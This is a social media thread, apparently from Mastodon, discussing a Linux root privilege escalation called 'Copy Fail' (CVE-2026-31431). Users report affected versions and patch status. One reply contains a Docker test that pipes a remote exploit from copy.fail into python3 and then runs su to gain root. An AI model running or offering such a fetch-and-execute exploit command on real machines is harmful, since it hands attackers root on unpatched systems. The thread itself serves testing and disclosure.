Yeah I tested CopyFail.
-
Yeah I tested CopyFail. It's real. Yikes.
Copy Fail: 732 Bytes to Root on Every Major Linux Distribution
CVE-2026-31431 Confirmed the exploit. It’s real.
IFIN (discourse.ifin.network)
-
Yeah I tested CopyFail. It's real. Yikes.
Copy Fail: 732 Bytes to Root on Every Major Linux Distribution
CVE-2026-31431 Confirmed the exploit. It’s real.
IFIN (discourse.ifin.network)
@mttaggart Can't privesc me if I always run as root!
-
Yeah I tested CopyFail. It's real. Yikes.
Copy Fail: 732 Bytes to Root on Every Major Linux Distribution
CVE-2026-31431 Confirmed the exploit. It’s real.
IFIN (discourse.ifin.network)
@mttaggart tested it in a docker image (used Noble as the LTS releases have patched kernels already):
```
host $ docker run --rm -it ubuntu:noble
container # apt update && apt install curl python3
container # su ubuntu
container $ curl https://copy.fail/exp | python3 && su
container #
```I'd say this is a welp of considerable magnitude
-
Yeah I tested CopyFail. It's real. Yikes.
Copy Fail: 732 Bytes to Root on Every Major Linux Distribution
CVE-2026-31431 Confirmed the exploit. It’s real.
IFIN (discourse.ifin.network)
@mttaggart Debian 13 still vulnerable with 6.12.74
-
Yeah I tested CopyFail. It's real. Yikes.
Copy Fail: 732 Bytes to Root on Every Major Linux Distribution
CVE-2026-31431 Confirmed the exploit. It’s real.
IFIN (discourse.ifin.network)
Editing to add:
RHEL has now updated the severity and the fix is no longer "deferred" for all affected OSes.
Looks like it requires a local user account, with a password set, to exploit, yes?
